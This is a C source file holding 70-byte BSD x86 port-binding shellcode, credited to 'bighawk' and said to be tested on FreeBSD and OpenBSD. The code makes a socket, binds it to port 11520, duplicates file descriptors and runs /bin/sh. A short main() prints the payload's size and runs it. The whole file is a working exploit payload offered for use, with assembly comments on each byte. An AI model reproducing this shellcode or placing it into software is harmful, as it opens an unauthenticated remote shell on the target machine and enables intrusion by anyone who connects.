/* 70 bytes portbinding shellcode - BSD-x86
 * - by bighawk (bighawk@kryptology.org)
 *
 * This shellcode binds a shell on port 11520
 * Tested on: FreeBSD-4.4, OpenBSD-2.6
 *
 */

char code[] =

   "\x31\xc0"			// xor	  eax, eax
   "\x99"			// cdq
   "\x52"			// push	  edx
   "\x42"			// inc	  edx
   "\x52"			// push	  edx
   "\x42"			// inc	  edx
   "\x52"			// push	  edx
   "\x50"			// push	  eax
   "\xb0\x61"			// mov	  al, 97
   "\xcd\x80"			// int	  80h
   "\x6a\x2d"                   // push   byte 45
   "\x66\x52"			// push	  dx
   "\x89\xe3"			// mov	  ebx, esp
   "\x6a\x10"			// push	  byte 16
   "\x53"			// push	  ebx
   "\x50"			// push	  eax
   "\x50"			// push	  eax
   "\xb0\x68"			// mov	  al, 104
   "\xcd\x80"			// int	  80h
   "\x5b"			// pop	  ebx
   "\x50"			// push	  eax
   "\x53"			// push	  ebx
   "\x50"			// push	  eax
   "\xb0\x6a"			// mov	  al, 106
   "\xcd\x80"			// int	  80h
   "\xb0\x1e"			// mov	  al, 30
   "\xcd\x80"			// int	  80h
   "\x52"			// push	  edx
   "\x50"			// push	  eax
   "\x52"			// push   edx
   "\xb0\x5a"			// mov	  al, 90
   "\xcd\x80"			// int	  80h
   "\x4a"			// dec	  edx
   "\x79\xf6"			// jns	  duploop
   "\x68\x6e\x2f\x73\x68"	// push	  dword 68732f6eh
   "\x68\x2f\x2f\x62\x69"	// push	  dword 69622f2fh
   "\x89\xe3"			// mov	  ebx, esp
   "\x50"			// push	  eax
   "\x54"			// push	  esp
   "\x53"			// push	  ebx
   "\x53"			// push	  ebx
   "\xb0\x3b"			// mov	  al, 59
   "\xcd\x80";			// int	  80h


main() {
  void (*a)() = (void *)code;
  printf("size: %d bytes\n", strlen(code));
  a();
}